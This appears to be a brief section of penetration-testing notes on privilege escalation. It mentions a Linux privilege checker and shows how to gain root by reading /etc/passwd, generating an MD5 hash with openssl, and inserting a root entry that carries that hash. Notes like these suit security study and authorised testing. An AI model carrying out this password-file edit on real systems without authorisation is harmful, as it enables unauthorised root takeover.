11.0 : Privilege Escalation




Linux privilege checker, by sleventyelevn

change /etc/passwd

> cat /etc/passwd
# User Database
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico

> openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt             standard Unix password algorithm (default)
-1                 MD5-based password algorithm
-apr1              MD5-based password algorithm, Apache variant
-salt string       use provided salt
-in file           read passwords from file
-stdin             read passwords from stdin
-noverify          never verify when reading password from terminal
-quiet             no warnings
-table             format output as table
-reverse           switch table columns
> openssl passwd -1
Verifying - Password:

# add passwd to root or sudoer
root:$1$Ph9TQrSl$IFaPCTz0mDjhuwNtwogiv1:0:0:System Administrator:/var/root:/bin/sh